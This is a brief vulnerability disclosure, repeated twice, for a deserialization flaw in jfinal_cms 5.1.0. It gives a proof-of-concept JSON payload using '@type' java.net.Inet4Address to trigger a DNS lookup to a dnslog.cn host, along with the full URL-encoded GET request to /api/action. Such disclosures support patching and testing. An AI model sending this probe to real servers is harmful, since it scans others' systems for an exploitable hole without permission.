The p parameter is passed in from the outside through the interface, and the parameters can be controlled, resulting in serialization.
POC:
p parameter content, URL encoding is required{"zeo":{"@type":"java.net.Inet4Address","val":"aporo8.dnslog.cn"}}
GET /api/action?version=1.0.1&apiNo=1000000&pageNo=1&pageSize=1&method=pageArticleSite&time=20170314160401&p=%7b%22%7a%65%6f%22%3a%7b%22%40%74%79%70%65%22%3a%22%6a%61%76%61%2e%6e%65%74%2e%49%6e%65%74%34%41%64%64%72%65%73%73%22%2c%22%76%61%6c%22%3a%22%61%70%6f%72%6f%38%2e%64%6e%73%6c%6f%67%2e%63%6e%22%7d%7d
jfinal_cms version:5.1.0 JDK version : jdk-8u351
Vulnerability file ApiForm.java
The p parameter is passed in from the outside through the interface, and the parameters can be controlled, resulting in serialization.
POC: p parameter content, URL encoding is required
{"zeo":{"@type":"java.net.Inet4Address","val":"aporo8.dnslog.cn"}}
GET /api/action?version=1.0.1&apiNo=1000000&pageNo=1&pageSize=1&method=pageArticleSite&time=20170314160401&p=%7b%22%7a%65%6f%22%3a%7b%22%40%74%79%70%65%22%3a%22%6a%61%76%61%2e%6e%65%74%2e%49%6e%65%74%34%41%64%64%72%65%73%73%22%2c%22%76%61%6c%22%3a%22%61%70%6f%72%6f%38%2e%64%6e%73%6c%6f%67%2e%63%6e%22%7d%7d